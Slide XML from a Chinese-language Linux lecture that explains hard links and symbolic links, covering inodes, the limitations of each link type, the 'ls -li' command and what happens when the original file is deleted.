              <a:t>檔名，最後還是共同指向一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>讀取到檔案實際內容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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/>
              <a:t>所將任何一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>刪除，其實 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>都還是存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的。</a:t>
            </a:r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645920" y="5035680"/>
              <a:ext cx="4095720" cy="78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30080" y="4972320"/>
                <a:ext cx="412740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6309360" y="5133600"/>
              <a:ext cx="398880" cy="6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293520" y="5070240"/>
                <a:ext cx="4305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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7400160" y="5257800"/>
              <a:ext cx="35964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384320" y="5194440"/>
                <a:ext cx="3913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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2116080" y="4251960"/>
              <a:ext cx="79740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100240" y="4188600"/>
                <a:ext cx="8290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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2397240" y="4219200"/>
              <a:ext cx="1659240" cy="1051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81040" y="4155840"/>
                <a:ext cx="16912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" name="筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3951720" y="4264920"/>
              <a:ext cx="59472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935520" y="4201560"/>
                <a:ext cx="626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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5035680" y="4284720"/>
              <a:ext cx="71244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019840" y="4221000"/>
                <a:ext cx="7441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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6812280" y="4264920"/>
              <a:ext cx="1639800" cy="396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796440" y="4201560"/>
                <a:ext cx="167148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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1593720" y="4696200"/>
              <a:ext cx="1234800" cy="396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577880" y="4632480"/>
                <a:ext cx="126648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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6884280" y="4722120"/>
              <a:ext cx="679680" cy="266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868440" y="4658760"/>
                <a:ext cx="7113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" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5297040" y="2488320"/>
              <a:ext cx="359640" cy="2552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281200" y="2424960"/>
                <a:ext cx="391320" cy="38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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5329800" y="2488320"/>
              <a:ext cx="268200" cy="268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313960" y="2424960"/>
                <a:ext cx="299880" cy="39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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2743200" y="1900800"/>
              <a:ext cx="2658600" cy="171792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733840" y="1891440"/>
                <a:ext cx="2677320" cy="1736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6251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連結介紹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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>硬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實體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缺點特徵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不能跨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、磁區。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不能 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄，只能連結檔案。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1456560" y="2109600"/>
              <a:ext cx="2475720" cy="590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40720" y="2046240"/>
                <a:ext cx="250740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604760" y="2233800"/>
              <a:ext cx="81036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588920" y="2170080"/>
                <a:ext cx="8420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352160" y="2625480"/>
              <a:ext cx="2122920" cy="396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36320" y="2562120"/>
                <a:ext cx="215460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467600" y="2593080"/>
              <a:ext cx="164628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451760" y="2529360"/>
                <a:ext cx="167796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991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建立硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>範例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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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/>
          <a:srcRect b="2593"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1585407"/>
            <a:ext cx="7580214" cy="2051497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964" y="4233356"/>
            <a:ext cx="7876836" cy="2320934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1215323"/>
            <a:ext cx="57887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建立檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(file)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997800" y="3679748"/>
            <a:ext cx="72403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建立硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，發現兩者檔案資訊皆相同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3572920" y="4408127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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>觀看檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -li</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3024000" y="1835280"/>
              <a:ext cx="921240" cy="3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08160" y="1771920"/>
                <a:ext cx="9529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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3572640" y="2037960"/>
              <a:ext cx="1026000" cy="198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556800" y="1974240"/>
                <a:ext cx="10576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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4813560" y="2090160"/>
              <a:ext cx="594720" cy="198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97720" y="2026440"/>
                <a:ext cx="62640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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2913120" y="2305440"/>
              <a:ext cx="757800" cy="136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97280" y="2242080"/>
                <a:ext cx="7894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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="999360" y="3082680"/>
              <a:ext cx="6270480" cy="72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83520" y="3019320"/>
                <a:ext cx="630216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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2919600" y="4284720"/>
              <a:ext cx="281160" cy="327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903760" y="4221000"/>
                <a:ext cx="3128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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3304800" y="4310640"/>
              <a:ext cx="398880" cy="3312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288960" y="4247280"/>
                <a:ext cx="4305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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3807720" y="4278240"/>
              <a:ext cx="510120" cy="198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791880" y="4214520"/>
                <a:ext cx="5418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" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="953640" y="5375520"/>
              <a:ext cx="842760" cy="3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37800" y="5311800"/>
                <a:ext cx="8744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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1025640" y="5564880"/>
              <a:ext cx="692640" cy="684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09440" y="5501160"/>
                <a:ext cx="7246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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2913120" y="5297040"/>
              <a:ext cx="39600" cy="30060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897280" y="5233320"/>
                <a:ext cx="71280" cy="42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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5956560" y="5401440"/>
              <a:ext cx="353160" cy="68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940720" y="5338080"/>
                <a:ext cx="3848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1" name="筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5963400" y="5630040"/>
              <a:ext cx="568440" cy="68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5947200" y="5566680"/>
                <a:ext cx="6004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2" name="筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="934200" y="2984760"/>
              <a:ext cx="751320" cy="2487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924840" y="2975400"/>
                <a:ext cx="770040" cy="267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0526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建立硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>範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619973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>刪除原始檔案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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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 rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="5566"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1927359"/>
            <a:ext cx="7666667" cy="186168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3860280" y="2057400"/>
              <a:ext cx="627120" cy="198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44080" y="1994040"/>
                <a:ext cx="65916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1757160" y="3206880"/>
              <a:ext cx="117720" cy="68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40960" y="3143520"/>
                <a:ext cx="149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6152760" y="3180960"/>
              <a:ext cx="451080" cy="133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136920" y="3117240"/>
                <a:ext cx="48276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4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連結介紹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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>軟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>符號連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特徵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>克服了硬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>連結不足之處，故建立對檔案間接指標，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>類似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系統中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>捷徑。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>軟連結和原始檔的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不同，代表為兩個不同檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所以連結會</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>佔用掉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>block 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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案屬性上軟連結明確寫出了是連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案，且兩者都不同步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受磁區範圍限制。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PS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>因為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>檔案名稱連結到目標檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若刪除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案後軟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>連結就無法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>再次建立相同檔案，軟連結又會重新指向這個檔案（但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>號與之前的不同了）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty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2188080" y="1554480"/>
              <a:ext cx="1704960" cy="460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72240" y="1491120"/>
                <a:ext cx="173664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429640" y="2142360"/>
              <a:ext cx="77112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13800" y="2078640"/>
                <a:ext cx="8028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513960" y="2142360"/>
              <a:ext cx="2273400" cy="198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498120" y="2078640"/>
                <a:ext cx="230508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352160" y="3096000"/>
              <a:ext cx="96696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336320" y="3032280"/>
                <a:ext cx="9986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834640" y="3076200"/>
              <a:ext cx="927720" cy="136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18800" y="3012840"/>
                <a:ext cx="9594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4160520" y="3148200"/>
              <a:ext cx="94752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144680" y="3084480"/>
                <a:ext cx="979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110240" y="3441960"/>
              <a:ext cx="72540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94400" y="3378600"/>
                <a:ext cx="757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5042160" y="3461760"/>
              <a:ext cx="1104480" cy="327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026320" y="3398040"/>
                <a:ext cx="113616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6916680" y="3507480"/>
              <a:ext cx="816840" cy="133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900840" y="3443760"/>
                <a:ext cx="84852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6792840" y="3487680"/>
              <a:ext cx="53568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777000" y="3424320"/>
                <a:ext cx="5673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665720" y="3997080"/>
              <a:ext cx="1371960" cy="201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649520" y="3933720"/>
                <a:ext cx="14040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5342760" y="4023360"/>
              <a:ext cx="2945880" cy="331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5326920" y="3960000"/>
                <a:ext cx="29775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024640" y="4924800"/>
              <a:ext cx="2273400" cy="68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008800" y="4861080"/>
                <a:ext cx="2305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2612520" y="5434200"/>
              <a:ext cx="1502640" cy="133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596680" y="5370480"/>
                <a:ext cx="153432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4461120" y="5414400"/>
              <a:ext cx="392040" cy="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445280" y="5351040"/>
                <a:ext cx="423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5336280" y="5401440"/>
              <a:ext cx="869040" cy="3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320440" y="5338080"/>
                <a:ext cx="900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7360920" y="5368680"/>
              <a:ext cx="1091160" cy="2016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345080" y="5305320"/>
                <a:ext cx="112284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2436120" y="5799960"/>
              <a:ext cx="529560" cy="3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420280" y="5736240"/>
                <a:ext cx="561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3651120" y="5819400"/>
              <a:ext cx="366120" cy="3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3635280" y="5756040"/>
                <a:ext cx="397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5166360" y="5773680"/>
              <a:ext cx="1842120" cy="684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5150520" y="5710320"/>
                <a:ext cx="18738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7818120" y="5669280"/>
              <a:ext cx="646920" cy="1332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802280" y="5605920"/>
                <a:ext cx="6786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1743840" y="6139440"/>
              <a:ext cx="242280" cy="684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1728000" y="6076080"/>
                <a:ext cx="2739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3233160" y="6178680"/>
              <a:ext cx="568440" cy="36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3217320" y="6115320"/>
                <a:ext cx="60012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2490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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>連結示意圖解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以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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案為例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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="4005064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 smtClean="0"/>
              <a:t>由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到連結檔的內容僅有檔名，根據檔名連結到正確的目錄去取得目標檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>， 最終就能夠讀取到正確的資料了。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dirty="0"/>
              <a:t>如果目標檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>被刪除了，整個環節就會無法繼續進行下去， 最後會發生無法透過連結檔讀取的問題了！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810544"/>
            <a:ext cx="5131630" cy="219452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2273040" y="2978280"/>
              <a:ext cx="353160" cy="331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57200" y="2914920"/>
                <a:ext cx="3848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5003280" y="2579760"/>
              <a:ext cx="614160" cy="136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987080" y="2516400"/>
                <a:ext cx="6462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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3050280" y="2181600"/>
              <a:ext cx="738360" cy="19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034440" y="2117880"/>
                <a:ext cx="77004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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3494520" y="5564880"/>
              <a:ext cx="3324600" cy="327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78320" y="5501160"/>
                <a:ext cx="33566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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3762000" y="1822320"/>
              <a:ext cx="235800" cy="1702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752640" y="1812960"/>
                <a:ext cx="254520" cy="18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382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008" b="33912"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="3194669"/>
            <a:ext cx="5141909" cy="3494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建立兩種連結與比較範例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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1215323"/>
            <a:ext cx="57887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建立檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(file)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1019237" y="2616336"/>
            <a:ext cx="74411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建立兩種連結與觀察比較三者檔案屬性關係</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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 rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="15002"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939422" y="1681821"/>
            <a:ext cx="6144722" cy="87940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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1665720" y="5407920"/>
              <a:ext cx="137520" cy="33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49520" y="5344560"/>
                <a:ext cx="1695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筆跡 3"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2462400" y="3298320"/>
              <a:ext cx="882000" cy="201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46560" y="3234960"/>
                <a:ext cx="9136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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2449440" y="3455280"/>
              <a:ext cx="1254240" cy="198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433600" y="3391560"/>
                <a:ext cx="12859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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2383920" y="4767840"/>
              <a:ext cx="137520" cy="6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68080" y="4704480"/>
                <a:ext cx="169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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2377440" y="4924800"/>
              <a:ext cx="11808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61600" y="4861080"/>
                <a:ext cx="149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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1678680" y="5427720"/>
              <a:ext cx="59040" cy="13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662840" y="5364000"/>
                <a:ext cx="9072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0" name="筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4506840" y="5401440"/>
              <a:ext cx="111708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491000" y="5338080"/>
                <a:ext cx="114876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54464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由於連結的方式不同，硬連結與符號連結有著以下的差異：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>當原檔刪除後，符號連結將會失效，硬連結則仍然可以繼續使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>硬連結只能連結同一個分割區內的檔案，而符號連結則因為只是一個指向檔案的字串，所以可以跨越不同分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>區。</a:t>
            </a:r>
